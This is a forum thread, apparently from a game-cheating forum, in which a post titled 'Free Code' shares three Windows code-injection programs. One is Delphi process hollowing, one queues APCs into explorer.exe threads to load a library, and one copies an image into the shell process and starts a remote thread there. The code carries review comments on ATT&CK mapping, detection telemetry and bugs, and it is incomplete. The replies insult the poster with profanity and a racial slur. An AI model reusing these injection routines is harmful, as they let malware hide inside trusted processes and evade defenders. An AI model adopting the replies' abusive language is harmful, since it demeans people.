

Free Code

 
DeletedUser14087
I post too much
Reputation: 2

Joined: 21 Jun 2006
Posts: 3069

PostPosted: Sat Jun 04, 2011 2:41 pm    Post subject: Free Code Reply with quote

Code:
uses
  Windows,
  ShellApi;

type
  // Open-ended view over the PE section table; the [0..0] bound is a
  // placeholder and the code indexes past it using NumberOfSections.
  TSections = array [0..0] of TImageSectionHeader;

// Rounds Size up to the next multiple of Alignment (returns Size unchanged
// when it is already a multiple).
function GetAlignedSize(Size: dword; Alignment: dword): dword;
begin
  if ((Size mod Alignment) = 0) then
  begin
    Result := Size;
  end
  else
  begin
    Result := ((Size div Alignment) + 1) * Alignment;
  end;
end;

// Computes the in-memory size of a PE file held in a buffer:
// SizeOfHeaders rounded up to SectionAlignment, plus every non-zero section
// VirtualSize rounded up to SectionAlignment.
// NOTE(review): nothing here checks the DOS/NT signatures or that _lfanew,
// SizeOfOptionalHeader and NumberOfSections stay inside the buffer, so a
// malformed image makes this read out of bounds.
function ImageSize(Image: pointer): dword;
var
  Alignment: dword;
  ImageNtHeaders: PImageNtHeaders;
  PSections: ^TSections;
  SectionLoop: dword;
begin
  // NT headers live at Image + e_lfanew; the dword casts assume 32-bit pointers.
  ImageNtHeaders := pointer(dword(dword(Image)) + dword(PImageDosHeader(Image)._lfanew));
  Alignment := ImageNtHeaders.OptionalHeader.SectionAlignment;
  // Same rounding as GetAlignedSize, written out inline.
  if ((ImageNtHeaders.OptionalHeader.SizeOfHeaders mod Alignment) = 0) then
  begin
    Result := ImageNtHeaders.OptionalHeader.SizeOfHeaders;
  end
  else
  begin
    Result := ((ImageNtHeaders.OptionalHeader.SizeOfHeaders div Alignment) + 1) * Alignment;
  end;
  // The section table starts right after the optional header.
  PSections := pointer(pchar(@(ImageNtHeaders.OptionalHeader)) + ImageNtHeaders.FileHeader.SizeOfOptionalHeader);
  for SectionLoop := 0 to ImageNtHeaders.FileHeader.NumberOfSections - 1 do
  begin
    if PSections[SectionLoop].Misc.VirtualSize <> 0 then
    begin
      if ((PSections[SectionLoop].Misc.VirtualSize mod Alignment) = 0) then
      begin
        Result := Result + PSections[SectionLoop].Misc.VirtualSize;
      end
      else
      begin
        Result := Result + (((PSections[SectionLoop].Misc.VirtualSize div Alignment) + 1) * Alignment);
      end;
    end;
  end;
end;

// Lays out the PE file at FileMemory the way a loader would (headers, then
// each section at its aligned position) in a local buffer, starts a second
// copy of the current executable (ParamStr(0)) suspended, writes the laid-out
// image into that child at the image's preferred ImageBase, points the
// child's initial thread at the image's entry point and resumes it.
//
// This create-suspended / write-image / redirect-thread / resume sequence is
// what is usually catalogued as process hollowing (MITRE ATT&CK T1055.012),
// although no unmap of the child's original image is visible in this listing.
// What endpoint telemetry sees: a CREATE_SUSPENDED child, a cross-process
// VirtualAllocEx with PAGE_EXECUTE_READWRITE, WriteProcessMemory,
// SetThreadContext and ResumeThread from the same parent, and afterwards
// executable private memory in the child that does not match the file on disk.
//
// NOTE(review): as posted, no API return value is checked, no relocations or
// imports are processed, the pointer arithmetic and the Ebx/Eax context
// fields are 32-bit only, and SizeOf(StartupInfo) names an identifier that is
// not declared anywhere in this listing (the local is StartInfo).
procedure CreateProcessEx(FileMemory: pointer);
var
  BaseAddress, Bytes, HeaderSize, InjectSize,
  SectionLoop, SectionSize: dword;
  Context: TContext;
  FileData: pointer;
  ImageNtHeaders: PImageNtHeaders;
  InjectMemory: pointer;
  ProcInfo: TProcessInformation;
  PSections: ^TSections;
  StartInfo: TStartupInfo;
begin
  ImageNtHeaders := pointer(dword(dword(FileMemory)) + dword(PImageDosHeader(FileMemory)._lfanew));
  InjectSize := ImageSize(FileMemory);
  GetMem(InjectMemory, InjectSize);
  try
    FileData := InjectMemory;
    // Copy only the header bytes that precede the first section's raw data.
    HeaderSize := ImageNtHeaders.OptionalHeader.SizeOfHeaders;
    PSections := pointer(pchar(@(ImageNtHeaders.OptionalHeader)) + ImageNtHeaders.FileHeader.SizeOfOptionalHeader);
    for SectionLoop := 0 to ImageNtHeaders.FileHeader.NumberOfSections - 1 do
    begin
      if PSections[SectionLoop].PointerToRawData < HeaderSize then HeaderSize := PSections[SectionLoop].PointerToRawData;
    end;
    CopyMemory(FileData, FileMemory, HeaderSize);
    FileData := pointer(dword(FileData) + GetAlignedSize(ImageNtHeaders.OptionalHeader.SizeOfHeaders, ImageNtHeaders.OptionalHeader.SectionAlignment));
    // Sections are appended back to back in table order; the section's own
    // VirtualAddress is never consulted, so this assumes the table is sorted
    // and contiguous - TODO confirm for the images this is used with.
    for SectionLoop := 0 to ImageNtHeaders.FileHeader.NumberOfSections - 1 do
    begin
      if PSections[SectionLoop].SizeOfRawData > 0 then
      begin
        // Copy min(SizeOfRawData, VirtualSize) bytes of raw data.
        SectionSize := PSections[SectionLoop].SizeOfRawData;
        if SectionSize > PSections[SectionLoop].Misc.VirtualSize then SectionSize := PSections[SectionLoop].Misc.VirtualSize;
        CopyMemory(FileData, pointer(dword(FileMemory) + PSections[SectionLoop].PointerToRawData), SectionSize);
        FileData := pointer(dword(FileData) + GetAlignedSize(PSections[SectionLoop].Misc.VirtualSize, ImageNtHeaders.OptionalHeader.SectionAlignment));
      end
      else
      begin
        // No raw data: just skip over the section's virtual extent.
        if PSections[SectionLoop].Misc.VirtualSize <> 0 then FileData := pointer(dword(FileData) + GetAlignedSize(PSections[SectionLoop].Misc.VirtualSize, ImageNtHeaders.OptionalHeader.SectionAlignment));
      end;
    end;
    ZeroMemory(@StartInfo, SizeOf(StartupInfo));
    ZeroMemory(@Context, SizeOf(TContext));
    // Child is another instance of this same executable, created suspended.
    CreateProcess(nil, pchar(ParamStr(0)), nil, nil, False, CREATE_SUSPENDED, nil, nil, StartInfo, ProcInfo);
    Context.ContextFlags := CONTEXT_FULL;
    GetThreadContext(ProcInfo.hThread, Context);
    // Reads 4 bytes at Ebx + 8 in the child; BaseAddress is not used afterwards.
    // Presumably Ebx holds the child's PEB address and +8 is its image-base
    // field on 32-bit Windows - confirm.
    ReadProcessMemory(ProcInfo.hProcess, pointer(Context.Ebx + 8), @BaseAddress, 4, Bytes);
    // Read/write/execute region at the image's preferred base; the result is
    // not checked, so a failed allocation goes unnoticed.
    VirtualAllocEx(ProcInfo.hProcess, pointer(ImageNtHeaders.OptionalHeader.ImageBase), InjectSize, MEM_RESERVE or MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(ProcInfo.hProcess, pointer(ImageNtHeaders.OptionalHeader.ImageBase), InjectMemory, InjectSize, Bytes);
    // Overwrite the same Ebx + 8 slot with the new image base.
    WriteProcessMemory(ProcInfo.hProcess, pointer(Context.Ebx + 8), @ImageNtHeaders.OptionalHeader.ImageBase, 4, Bytes);
    // Eax of the suspended initial thread is set to the new entry point.
    Context.Eax := ImageNtHeaders.OptionalHeader.ImageBase + ImageNtHeaders.OptionalHeader.AddressOfEntryPoint;
    SetThreadContext(ProcInfo.hThread, Context);
    ResumeThread(ProcInfo.hThread);
  finally
    // NOTE(review): the buffer came from GetMem but is released with
    // FreeMemory; ProcInfo.hProcess / hThread are never closed.
    FreeMemory(InjectMemory);
  end;
end;




Code:
#include <windows.h>
 
 
 
 
/* Local definition of the NT status type; this listing includes no header that provides it. */
typedef long NTSTATUS;
 
 
/*
 * Hand-written function-pointer type that main() uses for the address it
 * resolves with GetProcAddress(ntdll, "NtQueueApcThread"): thread handle,
 * routine address passed as a DWORD, one pointer argument, two ULONGs.
 * NOTE(review): the prototype is declared here rather than taken from a
 * header, and carrying the routine address in a DWORD is 32-bit only.
 */
typedef NTSTATUS (WINAPI *NtQAT)(HANDLE, DWORD, unsigned char *, ULONG, ULONG);
 
 
 
 
 
 
 
/* Singly linked list node holding one thread id; GetExplorerThreads() prepends nodes. */
typedef struct _threads_s
{
   DWORD            tid;    /* thread id taken from THREADENTRY32.th32ThreadID */
   struct _threads_s   *next;  /* next node, NULL at the end of the list */
} threads_s;
 
/*
 * Scans memory forward from `base`, one byte at a time, for a byte sequence
 * matching ERNEL32_LOW or ERNEL32_HIGH that is followed by DLL_LOW or
 * DLL_HIGH, and returns a pointer to the start of the match.
 *
 * ERNEL32_LOW, ERNEL32_HIGH, DLL_LOW and DLL_HIGH are not defined anywhere in
 * this listing; from the names and the printf text in GetERNEL32Address()
 * they are presumably the lower/upper-case pieces of "ernel32.dll" - confirm.
 *
 * Returns NULL only if the cursor is exactly 0xFFFFFFFF at the top of the
 * outer loop.
 */
unsigned char *FindERNEL32Address(unsigned char *base)
{
   unsigned char   *p;
   BOOL         found = FALSE;
 
   p = base;
 
   while (!found)
   {
      /* 32-bit-only sentinel; checked once per outer iteration, not per byte. */
      if ((unsigned int)p == 0xFFFFFFFF)
         return NULL;
 
      /*
       * NOTE(review): this inner scan has no upper bound. Nothing limits it
       * to the module's mapped size, so if the pattern is absent it walks
       * into unmapped memory and faults.
       */
      while (memcmp(p, ERNEL32_LOW, sizeof(ERNEL32_LOW) - 1) &&
         memcmp(p, ERNEL32_HIGH, sizeof(ERNEL32_HIGH) - 1))
         p++;
 
      /*
       * The suffix test is not tied to which prefix matched: a lower-case
       * prefix followed by the upper-case suffix (or the reverse) is accepted.
       */
      if (!memcmp(p + sizeof(ERNEL32_LOW) - 1, DLL_LOW, sizeof(DLL_LOW) - 1) ||
         !memcmp(p + sizeof(ERNEL32_HIGH) - 1, DLL_HIGH, sizeof(DLL_HIGH) - 1))
         found = TRUE;
      else
         p++;
   }
 
   return p;
}
 
/*
 * Loads kernel32.dll, stores the address of its LoadLibraryExA export in
 * *llexa, and returns the address (inside kernel32's mapped image) of the
 * string located by FindERNEL32Address(). Returns NULL on failure.
 *
 * Both values are addresses in THIS process. main() later hands them to a
 * thread in another process, which only makes sense if kernel32.dll is mapped
 * at the same address in both - an assumption of the technique, not something
 * this code verifies.
 */
unsigned char *GetERNEL32Address(DWORD *llexa)
{
   HMODULE         kernel32;
   unsigned char   *ernel32;
 
   kernel32 = LoadLibraryA("kernel32.dll");
   if (!kernel32)
   {
      printf("Failed to load kernel32.dll");
      return NULL;
   }
 
   /* Result is not checked for NULL; the DWORD cast truncates on 64-bit builds. */
   *llexa = (DWORD)GetProcAddress(kernel32, "LoadLibraryExA");
 
   /* The HMODULE is used as the scan start address. */
   ernel32 = FindERNEL32Address((unsigned char *)kernel32);
   if (!ernel32)
   {
      /* NOTE(review): this early return skips the FreeLibrary below. */
      printf("Failed to find ernel32.dll string");
      return NULL;
   }
 
   /* NOTE(review): %08X is given a pointer; the message says "offset" but the value is an absolute address. */
   printf("ernel32.dll string found at offset: %08X\n", ernel32);
 
   /*
    * The returned pointer still refers into kernel32's image after this call;
    * presumably safe because kernel32 stays loaded for the life of the
    * process - confirm.
    */
   FreeLibrary(kernel32);
 
   return ernel32;
}
 
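/*
 * Returns the process id of the first process in a Toolhelp snapshot whose
 * executable name equals EXPLORER (case-insensitive), or 0 when the snapshot
 * cannot be taken or no process matches. EXPLORER is defined outside this
 * listing.
 *
 * Changes from the posted version: CloseHandle() is no longer called on
 * INVALID_HANDLE_VALUE when the snapshot fails, the snapshot handle is closed
 * on a single path, and the DWORD is printed with a matching format.
 */
DWORD GetExplorerID()
{
   HANDLE         hprocess;
   PROCESSENTRY32   pe32 = {0};
   DWORD         pid = 0;

   hprocess = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
   if (hprocess == INVALID_HANDLE_VALUE)
   {
      /* Nothing to close: the snapshot was never created. */
      printf("Failed to find explorer.exe process id.");
      return 0;
   }

   /* dwSize must be set before Process32First or the call fails. */
   pe32.dwSize = sizeof(PROCESSENTRY32);
   if (Process32First(hprocess, &pe32))
   {
      do
      {
         if (!lstrcmpiA(pe32.szExeFile, EXPLORER))
         {
            /* First match wins; name matching cannot tell instances apart. */
            pid = pe32.th32ProcessID;
            break;
         }
      } while (Process32Next(hprocess, &pe32));
   }

   CloseHandle(hprocess);

   if (pid != 0)
      printf("Explorer.exe process id: %lu\n", (unsigned long)pid);
   else
      printf("Failed to find explorer.exe process id.");

   return pid;
}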
 
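/*
 * Builds a singly linked list of the ids of all threads owned by process
 * `pid`, taken from a system-wide Toolhelp thread snapshot. Nodes are
 * prepended, so the list is in reverse snapshot order. The caller owns the
 * list and must free() each node.
 *
 * Returns NULL when the snapshot cannot be taken, when the process has no
 * threads in the snapshot, or when an allocation fails.
 *
 * Changes from the posted version: an allocation failure no longer leaks the
 * snapshot handle and the nodes built so far, and CloseHandle() is no longer
 * called on INVALID_HANDLE_VALUE.
 */
threads_s *GetExplorerThreads(DWORD pid)
{
   HANDLE         hthread;
   THREADENTRY32   th32 = {0};
   threads_s      *threads = NULL;

   hthread = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
   if (hthread == INVALID_HANDLE_VALUE)
      return NULL;

   /* dwSize must be set before Thread32First or the call fails. */
   th32.dwSize = sizeof(THREADENTRY32);
   if (Thread32First(hthread, &th32))
   {
      do
      {
         threads_s   *n;

         /* The snapshot covers every process; keep only this pid's threads. */
         if (th32.th32OwnerProcessID != pid)
            continue;

         n = (threads_s *)malloc(sizeof(threads_s));
         if (n == NULL)
         {
            printf("Error allocating memory");

            /* Release everything collected so far before giving up. */
            while (threads != NULL)
            {
               threads_s   *next = threads->next;
               free(threads);
               threads = next;
            }
            CloseHandle(hthread);
            return NULL;
         }

         n->tid = th32.th32ThreadID;
         n->next = threads;
         threads = n;

         printf("Saved explorer.exe thread, id: %lu\n", (unsigned long)th32.th32ThreadID);
      } while (Thread32Next(hthread, &th32));
   }

   CloseHandle(hthread);
   return threads;
}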
 
/*
 * Entry point of the first listing. In order, it:
 *   1. resolves, in this process, the address of LoadLibraryExA and of the
 *      string found by GetERNEL32Address();
 *   2. looks up the explorer.exe process id and collects its thread ids;
 *   3. resolves NtQueueApcThread from ntdll.dll;
 *   4. opens every collected thread with THREAD_ALL_ACCESS and queues an APC
 *      whose routine is the LoadLibraryExA address and whose first argument
 *      is the string address, pausing one second between threads.
 *
 * The effect, if a target thread runs the APC, is a LoadLibraryExA call on
 * that string inside explorer.exe. This is the pattern catalogued as
 * MITRE ATT&CK T1055.004 (Asynchronous Procedure Call). Useful telemetry:
 * a non-system process opening many threads of another process with
 * THREAD_ALL_ACCESS in quick succession, cross-process APC queueing, and an
 * image-load event in explorer.exe for a module name that is not one of its
 * known modules.
 *
 * NOTE(review): the NTSTATUS returned by NtQueueApcThread is ignored, the
 * thread list nodes are never freed, the early returns leave ntdll loaded,
 * and several printf calls pass pointers or DWORDs to %08X / %d.
 */
int main()
{
   unsigned char   *ernel32;
   DWORD         pid;
   threads_s      *threads;
   HMODULE         ntdll;
   NtQAT         NtQueueApcThread;
   HANDLE         hthread;
   DWORD         llexa;
 
   if ((ernel32 = GetERNEL32Address(&llexa)) == NULL)
      return 0;
   
   if ((pid = GetExplorerID()) == 0)
      return 0;
 
   /* May be NULL; the loop below then simply does nothing. */
   threads = GetExplorerThreads(pid);
 
   ntdll = LoadLibraryA("ntdll.dll");
   if (!ntdll)
   {
      printf("Failed to load ntdll.dll");
      return 0;
   }
 
   /* Resolved by name at run time, so the call does not appear in the import table. */
   NtQueueApcThread = (NtQAT)GetProcAddress(ntdll, "NtQueueApcThread");
   if (!NtQueueApcThread)
   {
      printf("Failed to get address of NtQueueApcThread function");
      return 0;
   }
   else
      printf("NtQueueApcThread address is: %08X\n", NtQueueApcThread);
 
   printf("LoadLibraryEx address: %08X\n", llexa);
 
   while (threads != NULL)
   {
      printf("Trying thread: %d\n", threads->tid);
      /* Requests every thread access right, not just the one needed to queue an APC. */
      hthread = OpenThread(THREAD_ALL_ACCESS, FALSE, threads->tid);
      if (hthread == 0)
      {
         /* First failure aborts the whole run; remaining threads are skipped. */
         printf("Failed to open thread: %d", GetLastError());
         return 0;
      }
 
      /* Both addresses were computed in this process, not in the target. */
      NtQueueApcThread(hthread, llexa, ernel32, 0, 0);
      CloseHandle(hthread);
      Sleep(1000);
      threads = threads->next;
   }
   
   FreeLibrary(ntdll);
 
   return 0;
}
 
 
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
 
#include <windows.h>
#include <stdio.h>
#define MakePtr( cast, ptr, addValue ) (cast)( (DWORD)(ptr) + (addValue) )
 
BOOL Inject(DWORD dwPid, LPTHREAD_START_ROUTINE lpStartProc, LPVOID lpParam);
BOOL PerformRebase(LPVOID lpAddress, DWORD dwNewBase);
DWORD WINAPI RemoteThread(LPVOID lpParam);
 
/*
 * Entry point of the second listing: finds the window of class "Progman",
 * takes the id of the process that owns it, and calls Inject() so that
 * RemoteThread runs inside that process.
 *
 * NOTE(review): neither FindWindow nor GetWindowThreadProcessId is checked.
 * If no such window exists, hWnd is NULL and dwPid is passed to Inject()
 * uninitialised. Inject()'s BOOL result is ignored as well.
 */
int WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
{
   HWND hWnd;
   DWORD dwPid;
 
   /* "Progman" is presumably the shell's Program Manager window owned by explorer.exe - confirm. */
   hWnd = FindWindow("Progman", NULL);
 
   GetWindowThreadProcessId(hWnd, &dwPid);
 
   Inject(dwPid, (LPTHREAD_START_ROUTINE)RemoteThread, NULL);
   return 0;
}
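/*
 * Thread routine that reports which executable it is running in: it reads
 * the path of the host process's main module and shows it in a message box,
 * then ends the thread.
 *
 * lpParam is unused. The return statement is never reached because
 * ExitThread() does not return.
 *
 * Changes from the posted version: msg was MAX_PATH bytes, which cannot hold
 * the fixed prefix plus a path of up to MAX_PATH - 1 characters, so sprintf
 * could write past the end of the buffer. The buffer is now large enough and
 * the write is bounded. The path buffer is also explicitly terminated,
 * because GetModuleFileName can fail or truncate.
 */
DWORD WINAPI RemoteThread(LPVOID lpParam)
{
   char filename[MAX_PATH], msg[MAX_PATH + 64];
   DWORD len;

   len = GetModuleFileName(GetModuleHandle(NULL), filename, MAX_PATH);
   if (len == 0)
      filename[0] = '\0';            /* call failed: report an empty path */
   filename[MAX_PATH - 1] = '\0';    /* a truncated result may lack a terminator */

   snprintf(msg, sizeof(msg), "I am now inside of the remote process: %s\n", filename);
   MessageBox(0, msg, "", MB_OK);
   ExitThread(0);
   return 0;
}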
 
/*
 * Copies this process's own mapped image into process `dwPid` and starts a
 * thread there at the relocated address of lpStartProc, passing lpParam.
 * Returns TRUE only if every checked step succeeded.
 *
 * Steps, as written:
 *   - open the target with PROCESS_ALL_ACCESS;
 *   - snapshot SizeOfImage bytes of the current module into a local buffer;
 *   - allocate a read/write/execute region of the same size in the target;
 *   - fix up the local copy for the remote base with PerformRebase();
 *   - write the copy into the target and create a remote thread.
 *
 * This is the pattern catalogued as MITRE ATT&CK T1055.002 (Portable
 * Executable Injection). Useful telemetry: OpenProcess with
 * PROCESS_ALL_ACCESS on a shell process, VirtualAllocEx with
 * PAGE_EXECUTE_READWRITE, a WriteProcessMemory of image size, and a
 * CreateRemoteThread whose start address lies in private memory that is not
 * backed by any module on disk.
 *
 * NOTE(review): hProcess, the local VirtualAlloc buffer and the handle
 * returned by CreateRemoteThread are never released on any path, and the
 * result of PerformRebase() is ignored. The DWORD pointer casts are 32-bit
 * only. Nothing in this function resolves imports for the copied image.
 */
BOOL Inject(DWORD dwPid, LPTHREAD_START_ROUTINE lpStartProc, LPVOID lpParam)
{
   HMODULE hModule, hNewModule;
   DWORD dwSize;
   HANDLE hProcess;
 
   PIMAGE_DOS_HEADER pDH;
   PIMAGE_NT_HEADERS pPE;
 
   /* Requests every process access right rather than only those the later calls need. */
   if ((hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid)) == NULL)
      return FALSE;
 
   /* Base address of the current executable's mapped image. */
   hModule = GetModuleHandle(NULL);
 
   pDH = (PIMAGE_DOS_HEADER)hModule;
   pPE = (PIMAGE_NT_HEADERS) ((LPSTR)pDH + pDH->e_lfanew);
 
   dwSize = pPE->OptionalHeader.SizeOfImage;
 
   /* Local scratch copy, so relocations can be applied without touching the running image. */
   LPVOID lpNewAddr = VirtualAlloc(NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);
   if (lpNewAddr == NULL)
      return FALSE;
 
   CopyMemory(lpNewAddr, hModule, dwSize);
 
   /* Remote region is RWX for its whole lifetime; the address is chosen by the system. */
   hNewModule = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
   if (hNewModule == NULL)
      return FALSE;
 
   PerformRebase(lpNewAddr, (DWORD)hNewModule);
 
   if (WriteProcessMemory(hProcess, hNewModule, lpNewAddr, dwSize, NULL) == 0)
      return FALSE;
 
   /* Same offset from the image base, applied to the remote base. */
   DWORD dwThread = (DWORD)lpStartProc - (DWORD)hModule + (DWORD)hNewModule;
 
   if (CreateRemoteThread(hProcess, 0, 0, (LPTHREAD_START_ROUTINE)dwThread, lpParam, 0, NULL) == NULL)
      return FALSE;
 
   return TRUE;
}
 
/*
 * Applies base relocations to the mapped PE image at lpAddress so that it is
 * valid when placed at dwNewBase, then stores dwNewBase in the header's
 * ImageBase field.
 *
 * Returns FALSE if the DOS or NT signature is wrong, if a relocation entry
 * has a type other than 0 or 3, or if a value to be patched does not look
 * like an address inside the image. Returns TRUE otherwise.
 * On a FALSE return the image may already be partly patched.
 *
 * NOTE(review): the block walk trusts the relocation directory. A block with
 * SizeOfBlock == 0 never advances `c` or pBR, so the loop does not end, and a
 * SizeOfBlock smaller than the block header makes RelocCount negative. No
 * check keeps pBR or pReloc inside the image buffer.
 */
BOOL PerformRebase(LPVOID lpAddress, DWORD dwNewBase)
{
   PIMAGE_DOS_HEADER pDH = (PIMAGE_DOS_HEADER)lpAddress;
 
   if (pDH->e_magic != IMAGE_DOS_SIGNATURE)
      return FALSE;
 
   PIMAGE_NT_HEADERS pPE = (PIMAGE_NT_HEADERS) ((char *)pDH + pDH->e_lfanew);
 
   if (pPE->Signature != IMAGE_NT_SIGNATURE)
      return FALSE;
 
   /* Amount every absolute address must shift by (unsigned wrap-around is intended). */
   DWORD dwDelta = dwNewBase - pPE->OptionalHeader.ImageBase;
 
   DWORD dwVa = pPE->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress;
   DWORD dwCb = pPE->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;
 
   /* First relocation block; with dwCb == 0 the loop below is skipped entirely. */
   PIMAGE_BASE_RELOCATION pBR = MakePtr(PIMAGE_BASE_RELOCATION, lpAddress, dwVa);
 
   UINT c = 0;
   while (c < dwCb)
   {
      c += pBR->SizeOfBlock;
      /* Entries are 16-bit words that follow the block header. */
      int RelocCount = (pBR->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(WORD);
      LPVOID lpvBase = MakePtr(LPVOID, lpAddress, pBR->VirtualAddress);
      WORD *areloc = MakePtr(LPWORD, pBR, sizeof(IMAGE_BASE_RELOCATION));
 
      for (int i = 0; i < RelocCount; i++)
      {
         /* High 4 bits: relocation type. Low 12 bits: offset within the block's page. */
         int type = areloc[i] >> 12;
         if (type == 0)   /* 0 = IMAGE_REL_BASED_ABSOLUTE, a no-op entry */
            continue;
         if (type != 3)   /* 3 = IMAGE_REL_BASED_HIGHLOW, the only type handled here */
            return FALSE;
 
         int ofs = areloc[i] & 0x0fff;
 
         DWORD *pReloc = MakePtr(DWORD *, lpvBase, ofs);
         /* Sanity check: the current value must point inside the image at its old base. */
         if (*pReloc - pPE->OptionalHeader.ImageBase > pPE->OptionalHeader.SizeOfImage)
            return FALSE;
 
         *pReloc += dwDelta;
      }
      pBR = MakePtr(PIMAGE_BASE_RELOCATION, pBR, pBR->SizeOfBlock);
   }
   pPE->OptionalHeader.ImageBase = dwNewBase;
 
   return TRUE;
}
Slugsnack
Grandmaster Cheater Supreme
Reputation: 71

Joined: 24 Jan 2007
Posts: 1857

PostPosted: Sat Jun 04, 2011 3:13 pm    Post subject: Reply with quote

hey shitbrick. use windows' native character encoding, wchar. or better yet, tchar. and nigplz. sprintf and its associates are deprecated. _s plz, k ? and uhhh not closing handles ? memory leaks are pretty old school noobshit right there son. good job using an undeclared identifier ERNEL32_LOW as well.

that's after looking for half a minute. don't post up any more of your crap, shitfuck


Last edited by Slugsnack on Sat Jun 04, 2011 3:16 pm; edited 1 time in total
Evil_Intentions
Expert Cheater
Reputation: 65

Joined: 07 Jan 2010
Posts: 214

PostPosted: Sat Jun 04, 2011 3:15 pm    Post subject: Reply with quote

Slugsnack wrote:
hey shitbrick. use windows' native character encoding, wchar. or better yet, tchar. and nigplz. sprintf and its associates are deprecated. _s plz, k ? and uhhh not closing handles ? memory leaks are pretty old school noobshit right there son.

that's after looking for half a minute. don't post up any more of your crap, shitfuck


Calm down, I'm sure he just copied from some "LULZ WE R B14CKH4T" forum.
Slugsnack
Grandmaster Cheater Supreme
Reputation: 71

Joined: 24 Jan 2007
Posts: 1857

PostPosted: Sat Jun 04, 2011 3:17 pm    Post subject: Reply with quote

it's funny how he fucked off for several days to hand-select what he deemed to be the best piece of code there and managed to come back with this. noobs learning from noobs
AverageAzn247
Grandmaster Cheater
Reputation: 34

Joined: 01 Oct 2007
Posts: 909
Location: Austin,TX with 72 virgins

PostPosted: Sat Jun 04, 2011 3:26 pm    Post subject: Reply with quote

obvs meme is obvs
_________________


Waxxup wrote:
What are Night Elves?
A girl group?